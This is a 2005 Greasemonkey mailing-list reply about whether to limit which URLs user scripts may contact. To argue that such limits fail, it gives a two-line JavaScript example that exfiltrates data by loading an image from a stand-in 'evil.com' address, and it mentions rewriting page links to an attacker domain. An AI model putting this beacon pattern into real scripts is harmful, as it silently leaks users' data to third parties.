[Greasemonkey] GM_xmlhttpRequest and localhost

Aaron Boodman zboogs at gmail.com
Tue Jul 19 14:24:33 EDT 2005


> I'd like to be able to install a user script and not have to examine the
> entire thing (especially John's 93K monster) to make sure it's not
> sending anything I don't want it to to sites I don't know or trust.
> That's why I like the idea of explicitly specifying what URLs each
> script can access with GM_xmlhttpRequest. I can look at the headers for
> a script and immediately determine who it might be contacting and can
> make a quick decision as to whether I'm OK with that or not.

I would like this too, and I really think that this is the feature.
However, locking down GM_xmlhttpRequest is meaningless. If somebody
wants to steal your data with a user script, all they have to do is:

var img = new Image();
img.src = "http://evil.com?yourdata=....";

There are numerous features like this in todays browsers and it isn't
practical to block them all. Even if you could, a user script could
simply change the href of every anchor attribute to his evil domain.
By the time you figured out what happened, he'd already have you.

Preventing the *reading* of internal data is a better argument for
pattern restrictions on GM_xmlhttpRequest since this is not
implementable in JavaScript except through xmlhttprequest.

-a


More information about the Greasemonkey mailing list